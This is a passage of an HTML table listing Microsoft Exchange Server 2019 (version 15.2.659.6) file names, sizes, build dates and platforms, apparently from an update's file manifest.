/td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.odata.dll</td><td>15.2.659.6</td><td>2,993,544</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.common.dll</td><td>15.2.659.6</td><td>90,504</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.grain.dll</td><td>15.2.659.6</td><td>101,768</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.graincow.dll</td><td>15.2.659.6</td><td>38,272</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.graineventbasedassistants.dll</td><td>15.2.659.6</td><td>45,440</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.grainpropagationengine.dll</td><td>15.2.659.6</td><td>58,248</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.graintransactionstorage.dll</td><td>15.2.659.6</td><td>147,336</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.graintransportdeliveryagent.dll</td><td>15.2.659.6</td><td>26,496</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.graphstore.dll</td><td>15.2.659.6</td><td>184,192</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.permailboxkeys.dll</td><td>15.2.659.6</td><td>26,496</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.secondarycopyquotamanagement.dll</td><td>15.2.659.6</td><td>38,280</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.secondaryshallowcopylocation.dll</td><td>15.2.659.6</td><td>55,680</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.security.dll</td><td>15.2.659.6</td><td>147,336</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Micr
osoft.exchange.officegraph.semanticgraph.dll</td><td>15.2.659.6</td><td>191,872</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.tasklogger.dll</td><td>15.2.659.6</td><td>33,672</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.partitioncache.dll</td><td>15.2.659.6</td><td>28,032</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.passivemonitoringsettings.dll</td><td>15.2.659.6</td><td>32,648</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.photogarbagecollectionservicelet.dll</td><td>15.2.659.6</td><td>15,232</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.pop3.eventlog.dll</td><td>15.2.659.6</td><td>17,280</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.pop3.eventlog.dll.fe</td><td>15.2.659.6</td><td>17,280</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.pop3.exe</td><td>15.2.659.6</td><td>106,888</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.pop3.exe.fe</td><td>15.2.659.6</td><td>106,888</td><td>12-Aug-2020</td><td>21:25</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.pop3service.exe</td><td>15.2.659.6</td><td>24,968</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.pop3service.exe.fe</td><td>15.2.659.6</td><td>24,968</td><td>12-Aug-2020</td><td>21:25</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.popconfiguration.dl1</td><td>15.2.659.6</td><td>42,888</td><td>12-Aug-2020</td><td>21:25</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.popimap.core.dll</td><td>15.2.659.6</td><td>264,576</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.popimap.core.dll.fe</td><td>15.2.659.6</td><td>264,576</td><td>12-Aug-2020</td><td>21:25</td><td>Not 
applicable</td></tr><tr><td>Microsoft.exchange.powersharp.dll</td><td>15.2.659.6</td><td>358,280</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.powersharp.management.dll</td><td>15.2.659.6</td><td>4,166,016</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.powershell.configuration.dll</td><td>15.2.659.6</td><td>308,608</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Microsoft.exchange.powershell.rbachostingtools.dll</td><td>15.2.659.6</td><td>41,344</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.protectedservicehost.exe</td><td>15.2.659.6</td><td>30,592</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.protocols.fasttransfer.dll</td><td>15.2.659.6</td><td>137,088</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.protocols.mapi.dll</td><td>15.2.659.6</td><td>441,728</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.provisioning.eventlog.dll</td><td>15.2.659.6</td><td>14,216</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.provisioningagent.dll</td><td>15.2.659.6</td><td>224,648</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.provisioningservicelet.dll</td><td>15.2.659.6</td><td>105,864</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.pst.dll</td><td>15.2.659.6</td><td>168,832</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.pst.dll.deploy</td><td>15.2.659.6</td><td>168,832</td><td>12-Aug-2020</td><td>21:25</td><td>Not 
applicable</td></tr><tr><td>Microsoft.exchange.pswsclient.dll</td><td>15.2.659.6</td><td>259,464</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.publicfolders.dll</td><td>15.2.659.6</td><td>72,072</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.pushnotifications.crimsonevents.dll</td><td>15.2.659.6</td><td>215,944</td><td>12-Aug-2020</td><td>21:27</td><td>x64</td></tr><tr><td>Microsoft.exchange.pushnotifications.dll</td><td>15.2.659.6</td><td>106,872</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.pushnotifications.publishers.dll</td><td>15.2.659.6</td><td>425,856</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.pushnotifications.server.dll</td><td>15.2.659.6</td><td>70,528</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.query.analysis.dll</td><td>15.2.659.6</td><td>46,456</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.query.configuration.dll</td><td>15.2.659.6</td><td>215,944</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.query.core.dll</td><td>15.2.659.6</td><td>168,320</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.query.ranking.dll</td><td>15.2.659.6</td><td>343,424</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.query.retrieval.dll</td><td>15.2.659.6</td><td>174,464</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.query.suggestions.dll</td><td>15.2.659.6</td><td>95,112</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.realtimeanalyticspublisherservicelet.dll</td><td>15.2.659.6</td><td>127,360</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.relevance.core.dll</td><td>15.2.659.6</td><td>63,360</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsof
t.exchange.relevance.data.dll</td><td>15.2.659.6</td><td>36,744</td><td>12-Aug-2020</td><td>21:27</td><td>x64</td></tr><tr><td>Microsoft.exchange.relevance.mailtagger.dll</td><td>15.2.659.6</td><td>17,800</td><td>12-Aug-2020</td><td>21:27</td><td>x64</td></tr><tr><td>Microsoft.exchange.relevance.people.dll</td><td>15.2.659.6</td><td>9,666,952</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.relevance.peopleindex.dll</td><td>15.2.659.6</td><td>20,788,096</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.relevance.peopleranker.dll</td><td>15.2.659.6</td><td>36,736</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.relevance.perm.dll</td><td>15.2.659.6</td><td>97,664</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.relevance.sassuggest.dll</td><td>15.2.659.6</td><td>28,544</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Microsoft.exchange.relevance.upm.dll</td><td>15.2.659.6</td><td>72,072</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.routing.client.dll</td><td>15.2.659.6</td><td>15,752</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.routing.eventlog.dll</td><td>15.2.659.6</td><td>13,184</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.routing.server.exe</td><td>15.2.659.6</td><td>59,272</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpc.dll</td><td>15.2.659.6</td><td>1,646,984</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Microsoft.exchange.rpcclientaccess.dll</td><td>15.2.659.6</td><td>207,232</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpcclientaccess.exmonhandler.dll</td><td>15.2.659.6</td><td>60,288</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpcclientaccess.handler.dll</td><td>15.2.659.6</td><td
>518,024</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpcclientaccess.monitoring.dll</td><td>15.2.659.6</td><td>161,152</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpcclientaccess.parser.dll</td><td>15.2.659.6</td><td>724,352</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpcclientaccess.server.dll</td><td>15.2.659.6</td><td>234,872</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpcclientaccess.service.eventlog.dll</td><td>15.2.659.6</td><td>20,864</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.rpcclientaccess.service.exe</td><td>15.2.659.6</td><td>35,208</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpchttpmodules.dll</td><td>15.2.659.6</td><td>42,376</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpcoverhttpautoconfig.dll</td><td>15.2.659.6</td><td>56,192</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpcoverhttpautoconfig.eventlog.dll</td><td>15.2.659.6</td><td>27,520</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.rules.common.dll</td><td>15.2.659.6</td><td>130,440</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.saclwatcher.eventlog.dll</td><td>15.2.659.6</td><td>14,720</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Microsoft.exchange.saclwatcherservicelet.dll</td><td>15.2.659.6</td><td>20,352</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.safehtml.dll</td><td>15.2.659.6</td><td>21,376</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.sandbox.activities.dll</td><td>15.2.659.6</td><td>267,648</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.sandbox.contacts.dll</td><td>15.2.659.6</td><td>110,984</td><t
d>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.sandbox.core.dll</td><td>15.2.659.6</td><td>112,512</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.sandbox.services.dll</td><td>15.2.659.6</td><td>622,464</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.search.bigfunnel.dll</td><td>15.2.659.6</td><td>185,216</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.search.bigfunnel.eventlog.dll</td><td>15.2.659.6</td><td>12,168</td><td>12-Aug-2020</td><td>21:27</td><td>x64</td></tr><tr><td>Microsoft.exchange.search.blingwrapper.dll</td><td>15.2.659.6</td><td>19,336</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.search.core.dll</td><td>15.2.659.6</td><td>211,848</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.search.ediscoveryquery.dll</td><td>15.2.659.6</td><td>17,800</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.search.engine.dll</td><td>15.2.659.6</td><td>97,664</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.search.fast.configuration.dll</td><td>15.2.659.6</td><td>16,776</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.search.fast.dll</td><td>15.2.659.6</td><td>436,616</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.search.files.dll</td><td>15.2.659.6</td><td>274,304</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.search.flighting.dll</td><td>15.2.659.6</td><td>24,968</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.search.mdb.dll</td><td>15.2.659.6</td><td>217,984</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.search.service.exe</td><td>15.2.659.6</td><td>26,496</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.s
ecurity.applicationencryption.dll</td><td>15.2.659.6</td><td>221,048</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.security.dll</td><td>15.2.659.6</td><td>1,558,400</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.security.msarpsservice.exe</td><td>15.2.659.6</td><td>19,840</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.security.securitymsg.dll</td><td>15.2.659.6</td><td>28,552</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Microsoft.exchange.server.storage.admininterface.dll</td><td>15.2.659.6</td><td>225,160</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.common.dll</td><td>15.2.659.6</td><td>5,151,104</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.diagnostics.dll</td><td>15.2.659.6</td><td>214,912</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.directoryservices.dll</td><td>15.2.659.6</td><td>115,576</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.esebackinterop.dll</td><td>15.2.659.6</td><td>82,824</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.server.storage.eventlog.dll</td><td>15.2.659.6</td><td>80,768</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.server.storage.fulltextindex.dll</td><td>15.2.659.6</td><td>66,440</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.ha.dll</td><td>15.2.659.6</td><td>81,288</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.lazyindexing.dll</td><td>15.2.659.6</td><td>211,848</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.logicaldatamodel.dll</td><td>15.2.659.6</td><td>1,341,312</td><td>12-Aug-2020</td><td>21:2
6</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.mapidisp.dll</td><td>15.2.659.6</td><td>511,872</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.multimailboxsearch.dll</td><td>15.2.659.6</td><td>47,496</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.physicalaccess.dll</td><td>15.2.659.6</td><td>873,352</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.propertydefinitions.dll</td><td>15.2.659.6</td><td>1,352,072</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.propertytag.dll</td><td>15.2.659.6</td><td>30,592</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.rpcproxy.dll</td><td>15.2.659.6</td><td>130,440</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.storecommonservices.dll</td><td>15.2.659.6</td><td>1,018,752</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.storeintegritycheck.dll</td><td>15.2.659.6</td><td>111,488</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.workermanager.dll</td><td>15.2.659.6</td><td>34,696</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.xpress.dll</td><td>15.2.659.6</td><td>19,336</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.servicehost.eventlog.dll</td><td>15.2.659.6</td><td>14,728</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Microsoft.exchange.servicehost.exe</td><td>15.2.659.6</td><td>60,800</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.servicelets.globallocatorcache.dll</td><td>15.2.659.6</td><td>50,560</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.servicelets.globalloc
atorcache.eventlog.dll</td><td>15.2.659.6</td><td>14,216</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.servicelets.unifiedpolicysyncservicelet.eventlog.dll</td><td>15.2.659.6</td><td>14,216</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Microsoft.exchange.services.common.dll</td><td>15.2.659.6</td><td>74,112</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.services.dll</td><td>15.2.659.6</td><td>8,494,464</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.services.eventlogs.dll</td><td>15.2.659.6</td><td>30,088</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.services.ewshandler.dll</td><td>15.2.659.6</td><td>633,728</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.services.ewsserialization.dll</td><td>15.2.659.6</td><td>1,651,080</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.services.json.dll</td><td>15.2.659.6</td><td>296,320</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.services.messaging.dll</td><td>15.2.659.6</td><td>43,392</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.services.onlinemeetings.dll</td><td>15.2.659.6</td><td>233,344</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.services.surface.dll</td><td>15.2.659.6</td><td>178,560</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.services.wcf.dll</td><td>15.2.659.6</td><td>348,552</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.setup.acquirelanguagepack.dll</td><td>15.2.659.6</td><td>56,712</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.setup.bootstrapper.common.dll</td><td>15.2.659.6</td><td>93,056</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.setup.common
.dll</td><td>15.2.659.6</td><td>296,320</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.setup.commonbase.dll</td><td>15.2.659.6</td><td>35,720</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.setup.console.dll</td><td>15.2.659.6</td><td>27,008</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.setup.gui.dll</td><td>15.2.659.6</td><td>114,560</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.setup.parser.dll</td><td>15.2.659.6</td><td>53,640</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.setup.signverfwrapper.dll</td><td>15.2.659.6</td><td>75,144</td><td>12-Aug-2020</td><td>21:27</td><td>x64</td></tr><tr><td>Microsoft.exchange.sharedcache.caches.dll</td><td>15.2.659.6</td><td>142,720</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.sharedcache.client.dll</td><td>15.2.659.6</td><td>24,968</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.sharedcache.eventlog.dll</td><td>15.2.659.6</td><td>15,232</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.sharedcache.exe</td><td>15.2.659.6</td><td>58,752</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.sharepointsignalstore.dll</td><td>15.2.659.6</td><td>27,016</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.slabmanifest.dll</td><td>15.2.659.6</td><td>46,976</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.sqm.dll</td><td>15.2.659.6</td><td>46,968</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.store.service.exe</td><td>15.2.659.6</td><td>28,024</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.store.worker.exe</td><td>15.2.659.6</td><td>26,504</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Mi
crosoft.exchange.storeobjectsservice.eventlog.dll</td><td>15.2.659.6</td><td>13,696</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.storeobjectsservice.exe</td><td>15.2.659.6</td><td>31,616</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.storeprovider.dll</td><td>15.2.659.6</td><td>1,205,120</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.structuredquery.dll</td><td>15.2.659.6</td><td>158,592</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Microsoft.exchange.symphonyhandler.dll</td><td>15.2.659.6</td><td>628,104</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.syncmigration.eventlog.dll</td><td>15.2.659.6</td><td>13,184</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Microsoft.exchange.syncmigrationservicelet.dll</td><td>15.2.659.6</td><td>16,264</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.systemprobemsg.dll</td><td>15.2.659.6</td><td>13,192</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Microsoft.exchange.textprocessing.dll</td><td>15.2.659.6</td><td>221,576</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.textprocessing.eventlog.dll</td><td>15.2.659.6</td><td>13,688</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Microsoft.exchange.transport.agent.addressbookpolicyroutingagent.dll</td><td>15.2.659.6</td><td>29,064</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.antispam.common.dll</td><td>15.2.659.6</td><td>138,624</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.contentfilter.cominterop.dll</td><td>15.2.659.6</td><td>21,880</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.controlflow.dll</td><td>15.2.659.6</td><td>40,320</td><td>12-Aug-2020</td><td>21:26</
td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.faultinjectionagent.dll</td><td>15.2.659.6</td><td>22,920</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.frontendproxyagent.dll</td><td>15.2.659.6</td><td>21,376</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.hygiene.dll</td><td>15.2.659.6</td><td>212,352</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.interceptoragent.dll</td><td>15.2.659.6</td><td>98,688</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.liveidauth.dll</td><td>15.2.659.6</td><td>22,920</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.malware.dll</td><td>15.2.659.6</td><td>169,344</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.malware.eventlog.dll</td><td>15.2.659.6</td><td>18,312</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.transport.agent.phishingdetection.dll</td><td>15.2.659.6</td><td>20,864</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.prioritization.dll</td><td>15.2.659.6</td><td>31,616</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.protocolanalysis.dbaccess.dll</td><td>15.2.659.6</td><td>46,984</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.search.dll</td><td>15.2.659.6</td><td>30,088</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.senderid.core.dll</td><td>15.2.659.6</td><td>53,120</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.sharedmailboxsentitemsroutingagent.dll</td><td>15.2.659.6</td><td>44,936</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td>
</tr><tr><td>Microsoft.exchange.transport.agent.systemprobedrop.dll</td><td>15.2.659.6</td><td>18,304</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.transportfeatureoverrideagent.dll</td><td>15.2.659.6</td><td>46,456</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.trustedmailagents.dll</td><td>15.2.659.6</td><td>46,456</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.cloudmonitor.common.dll</td><td>15.2.659.6</td><td>28,032</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.common.dll</td><td>15.2.659.6</td><td>457,096</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.contracts.dll</td><td>15.2.659.6</td><td>18,312</td><td>12-Aug-2020</td><td>